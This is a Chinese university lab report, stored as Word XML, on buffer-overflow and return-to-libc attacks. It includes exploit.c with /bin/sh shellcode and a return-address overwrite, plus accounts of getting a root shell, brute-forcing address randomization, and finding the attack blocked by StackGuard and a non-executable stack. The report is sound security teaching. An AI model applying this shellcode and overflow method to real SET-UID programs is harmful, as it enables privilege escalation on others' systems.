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第二次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>网安综合课程设计报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="none"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="none"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（Buffer Overflow Vulnerability Lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;Return-to-libc Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="none"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）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57117228 陈佑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"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color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Part1——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Buffer Overflow Vulnerability Lab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一． Running Shellcode（shellcode是启动shell的代码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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Step1.编译call_shellcode.c并执行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如下图所示，对call_shellcode.c文件进行编译执行，它会调用execve()来执行/bin/sh，从而启动shell。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777865" cy="1134745"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="5" name="图片 5" descr="MBF[H9~KQYG1MC%%PZN_1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BF[H9~KQYG1MC%%PZN_1FR"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:srcRect t="4222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Step2.将stack设置为SET-UID程序，并且利用其漏洞获得root特权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872490"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="6" name="图片 6" descr="70AX$5_0%LR]AW7VX]1JU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0AX$5_0%LR]AW7VX]1JUJ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stack程序从一个名为badfile的文件中获取其输入。可以通过为badfile创建内容，将且内容复制到缓冲器内，来生成一个shell。在接下来的task2中，将会生成一个exploit.c文件，用于生成这个badfile。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二． Exploiting the Vulnerability（利用漏洞）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目的——要求在关闭所有保护机制的情况下，完成漏洞程序的设计，并实现攻击。设计思路是，合理填充badfile文件的内容，实现在用户程序stack.c读取该文件并拷贝到自己的缓冲区（即bof（char*str）函数栈帧存储空间）后，由于缓冲区溢出，执行bof函数的返回地址内存单元被覆盖且对应换成了shellcode的首地址，接下来用户程序执行shellcode并启动了带有用户程序权限的shell。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="20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sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>题目中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提供了一个名为“expl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>it.c”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的代码，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个代码的目的是为badfile构造内容。在这个代码中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shellcode是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提供了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，剩下的部分需要自己构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32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Step1.补充exploit.c文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBd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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>* exploit.c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/* A program that creates a file containing code for launching shell*/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&lt;stdlib.h&gt;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&lt;stdio.h&gt;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&lt;string.h&gt;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char shellcode[]=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"\x31\xc0"             /* xorl    %eax,%eax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"\x50"                 /* pushl   %eax     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"\x68""//sh"           /* pushl   $0x68732f2f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"\x68""/bin"           /* pushl   $0x6e69622f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"\x89\xe3"             /* movl    %esp,%ebx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"\x50"                 /* pushl   %eax     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"\x53"                 /* pushl   %ebx     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"\x89\xe1"             /* movl    %esp,%ecx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"\x99"                 /* cdq              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"\xb0\x0b"             /* movb    $0x0b,%al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"\xcd\x80"             /* int     $0x80                 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;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void main(int argc, char **argv)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{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char buffer[517];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FILE *badfile;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/* Initialize buffer with 0x90 (NOP instruction)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memset(&amp;buffer, 0x90, 517);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/* You need to fill the buffer with appropriate contents here */ </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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    strcpy(buffer+100,shellcode);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//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①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将shellcode拷贝至buffer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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    strcpy(buffer+0x24,"\xbb\xf1\xff\xbf");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//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②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在buffer特定偏移处起始的四个字节覆盖sellcode地址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/* Save the contents to the file "badfile"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ab/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badfile = fopen("./badfile", "w");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fwrite(buffer, 517, 1, badfile);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fclose(badfile);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBd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蓝字加粗部分是自己构造的部分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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①——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因为在攻击程序exploit.c编译执行后，buffer的内容即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>badfile的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以需要将shellcode拷贝至buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482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②——在buffer特定偏移处起始的四个字节中写入了一个字。攻击程序exploit.c构造badfile文件，而后被漏洞程序读取，进而拷贝进自己的缓冲区。所以漏洞程序有了shellcode，特定偏移是为了实现拷贝过程中shellcode的首地址正好覆盖bof函数执行后的返回地址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Step2.编译exploit.c文件并且运行stack程序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865" cy="673735"/>
            <wp:effectExtent l="0" t="0" r="635" b="12065"/>
            <wp:docPr id="7" name="图片 7" descr=")VVY_6QXQ]759W}3R4K[_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)VVY_6QXQ]759W}3R4K[_F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对exploit.c编译并且执行，生成badfile文件，再执行stack程序，可以将badfile文件内容传递给缓冲区，从而使漏洞程序stack有了shellcode。执行stack程序就可以成功获得一个root shell，task2的攻击成功。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三． Defeating dash’s Countermeasure（破解dash对抗策略）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Step1.对setuid(0)注释后，编译dash_shell_test.c并且执行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054735"/>
            <wp:effectExtent l="0" t="0" r="10795" b="12065"/>
            <wp:docPr id="8" name="图片 8" descr="}I39O5_]WW44NNGJUSB]K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}I39O5_]WW44NNGJUSB]KX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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对setuid(0)注释后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，编译dash_shell_test.c并运行，则可以获取root shell，这是因为此时dash_shell_test是SET-UID程序，将以root身份执行。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Step2.对setuid(0)取消注释后，编译dash_shell_test.c并且执行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530860"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="10" name="图片 10" descr="$G$6S{3HS38_CG58L_MII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$G$6S{3HS38_CG58L_MII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如上图所示，对setuid(0)取消注释后，编译dash_shell_test.c并运行dash_shell_test_new可执行文件，将不能获取root shell。这是因为setuid(0)系统调用可以将RUID和EUID设为相同值0，从而将SET-UID进程改为一个普通用户进程，降低权限后再打开shell。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Step3.更改exploit.c中的shellcode，重新执行task2的攻击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711835"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12065"/>
            <wp:docPr id="11" name="图片 11" descr="J{ZQ)53DN0Q7WH7GQA9`8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{ZQ)53DN0Q7WH7GQA9`8_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39"/>
        </w:tabs>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现task2的攻击无法实现，无法获取一个root shell。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这是由于新的shellcode中添加了setuid(0)的系统调用，将原本的SET-UID进程降低权限为普通进程，阻止了root shell攻击，并且检测到栈溢出，所以打印输出“Segmentation fault”错误。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四． Defeating Address Randomization（破解地址随机化）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实验目的——使用暴力破解脚本来击败地址随机化对策 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Step1.使用以下命令打开Ubuntu的地址随机化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3515" cy="389890"/>
            <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
            <wp:docPr id="12" name="图片 12" descr="%EJ3)$8HNPE}{~22@${CT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%EJ3)$8HNPE}{~22@${CTJ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地址随机化可以使得一个程序每次分配的地址不一样，攻击者很难猜中栈的地址，因而可以提升程序的安全性。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Step2.使用暴力破解脚本来反复攻击程序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使用蛮力方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>无限循环，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反复攻击易受攻击的程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，如果攻击成功，脚本就会停止运行。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144770" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="11430" b="0"/>
            <wp:docPr id="31" name="图片 31" descr="A3365F950901ADA9074F82419D0FE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3365F950901ADA9074F82419D0FE318"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect t="2455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highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如上图所示，经过32807次循环，获得了正确的badfile，击败了地址随机化保护策略。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五． Turn on the StackGuard Protection（打开StackGuard保护机制）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Step1.关闭地址随机化机制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Step2.打开StackGuard保护机制编译stack.c，重新执行task2的攻击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960" cy="1388745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="14" name="图片 14" descr="G8}B{Q8V0WU`J4FLLMS2P$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8}B{Q8V0WU`J4FLLMS2P$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先关闭地址随机化机制，再打开StackGuard保护机制，保护机制可以及时发现栈的溢出。接下来对task1中的stack.c重新编译运行（新的可执行程序为stack_protect）。重新执行task2的攻击，无法获得shell，所以攻击失败，StackGuard保护机制生效。</w:t>
      </w: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六． Turn on the Non-executable Stack Protection（打开Non-executable Stack保护机制）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Step1.关闭地址随机化机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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Step2.打开Non-executable Stack保护机制编译stack.c，重新执行task2的攻击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3515" cy="1247140"/>
            <wp:effectExtent l="0" t="0" r="6985" b="10160"/>
            <wp:docPr id="15" name="图片 15" descr="9N4Q11DSDN{C~YBLN1YZJ{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N4Q11DSDN{C~YBLN1YZJ{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如上图所示，先关闭地址随机化机制，再打开Non-executable Stack保护机制，对task1中的stack.c重新编译运行（新的可执行程序为stack_protect_noexe）。重新执行task2的攻击，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以看到——无法获得shell，攻击失败，Non-executable Stack保护机制生效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs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none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>无法获得shell的原因——Non-executable Stack保护机制开启，栈空间是无法执行的，即使用代码覆盖也无法运行，所以无法启动shell。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="dashed" w:color="auto" w:sz="18" w:space="0"/>
        </w:pBd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pBdr>
          <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:ind w:firstLine="482" w:firstLineChars="200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color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Part2——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Return-to-libc Attack Lab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Finding out the addresses of libc functions（寻找libc函数的地址）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Step1.关闭地址随机化机制，并且创建retlib.c（存在漏洞的文件），关闭保护机制后编译，将其设置为SET-UID程序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70510"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8890"/>
            <wp:docPr id="19" name="图片 19" descr="4W9JCYS}(]@TX5M(@5]~E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W9JCYS}(]@TX5M(@5]~E4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15595"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1905"/>
            <wp:docPr id="18" name="图片 18" descr="6I_{KX4@]6}Q`V5OSZJ~Y7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I_{KX4@]6}Q`V5OSZJ~Y7J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 使用调试工具gdb查找system()的地址。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230" cy="1390015"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="20" name="图片 20" descr="]$E}SAL)]V8D5$I6BPC]SU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]$E}SAL)]V8D5$I6BPC]SU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由于之前已经将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>内存地址随机化被关闭，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对于同一个程序，库总是加载在同一个内存地址中。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gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，键入run命令执行一次目标程序，否则将不会加载库代码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用p命令(或print)打印出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>system()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的地址和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>exit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以看到，system()的地址为0xb7e5f430，exit()的地址为0xb7e52fb0。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Putting the shell string（"/bin/sh"） in the memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="2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实验目的——为了获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shell，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()函数执行“/bin/sh”程序。因此，命令字符串“/bin/sh”必须首先放在内存中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>必须知道它的地址（这个地址需要传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()函数）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里选用shell变量的方法解决。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Step1.定义一个shell变量MYSHELL，使它包含字符串"/bin/sh"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shell实际上生成一个子进程来执行程序，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>并且由Lab1-report中的实验可知，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所有导出的shell变量都成为子进程的环境变量。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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5420" cy="562610"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8890"/>
            <wp:docPr id="3" name="图片 3" descr="{BGOE1RX[}24ZTY2ZFXX6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BGOE1RX[}24ZTY2ZFXX6~K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定义一个新的shell变量MYSHELL，并让它包含字符串“/bin/sh”。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用env指令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
